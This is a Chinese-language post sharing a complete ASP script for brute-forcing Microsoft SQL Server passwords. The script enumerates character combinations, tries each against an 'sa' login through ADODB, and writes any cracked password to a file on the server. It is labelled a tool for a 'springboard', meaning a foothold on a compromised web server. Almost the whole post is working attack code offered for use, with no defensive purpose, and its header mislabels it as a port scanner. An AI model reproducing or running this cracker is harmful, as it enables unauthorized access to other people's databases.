一个暴力破解MSSQL用户密码的ASP程序

作者: knight

一个暴力mssql用户密码的asp程序,以下这个版本是可以运行之后关闭，运行完毕将在当前目录生成结果文件的。

code:
[copy to clipboard]
<%
============ asp port scanner by lake2 ===================
http://lake2.0x54.org
version: 0.1
for springboard
==========================================================
%>
<style type="text/css">
body,td,th {color: #0000ff;font-family: verdana, arial, helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000ff;text-decoration: none;}
a:visited {text-decoration: none;color: #0000ff;}
a:hover {text-decoration: none;color: #ff0000;}
a:active {text-decoration: none;color: #ff0000;}
.buttom {color: #ffffff; border: 1px solid #084b8e; background-color: #719bc5}
.textbox {border: 1px solid #084b8e}
.stylered {color: #ff0000}
</style>
<title>mssql cracker for springboard</title>
<%
dim password()
if request.form("go") <> "1" then
%>
    <p align="center">welcome to <a href="" target="_blank">http://lake2.0x54.org</a> </p>
    <form name="form1" method="post" action="" onsubmit="form1.submit.disabled=true;">
     connstr:
     <input name="conn" type="text" class="textbox" id="conn" value="provider=sqloledb.1;data source=127.0.0.1;user id=sa;password={pass};" size="70">
     <br>
     char:    
     <input name="char" type="text" class="textbox" id="char" value="0123456789" size="30">
   <br>
length: 
<input name="len" type="text" class="textbox" id="len" value="3" size="4">
<br>
path:    
<input name="path" type="text" class="textbox" value="<%=server.mappath("r.txt")%>" size="50">
<input name="cfile" type="checkbox" class="textbox" id="cfile" value="1" checked>
enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="submit" type="submit" class="buttom" id="submit" value=" run ">
</form>
<%
else
    timer1 = timer
    server.scripttimeout = 7776000
    connstr = request.form("conn")
    char = request.form("char")
    lenchar = len(char)
    redim password(lenchar)
    for i = 1 to lenchar
    password(i) = mid(char, i, 1)
    next
    length = cint(request.form("len"))
    call lake("")
    response.write "done!<br>process " & ttime & " s"
    if request.form("cfile") <> "" then createresult("done!" & vbcrlf & ttime)
end if

sub lake(str)
    if len(str) >= length then exit sub
    for j = 1 to lenchar
    pass = str & password(j)
    if len(pass) = length then call crack(pass)
    call lake(pass)
    next
end sub

sub crack(str)
    on error resume next
    set conn = server.createobject("adodb.connection")
    conn.open replace(connstr,"{pass}",str)
    if err then
    if err.number <> -2147217843 then
    response.write(err.description & "<br>")
    response.end()
    end if
    else
    response.write("i get it ! password is <font color=red>" & str & "</font><br>process " & ttime & " s")
    if request.form("cfile") <> "" then createresult(str & vbcrlf & ttime)
    response.end()
    end if
end sub

function ttime()
    timer2 = timer
    thetime=cstr(int(timer2-timer1))
    ttime = thetime
end function

sub createresult(t)
    set fs = createobject("scripting.filesystemobject")
    set outfile = fs.createtextfile(request.form("path"))
    outfile.writeline t
    set fs = nothing
end sub
%>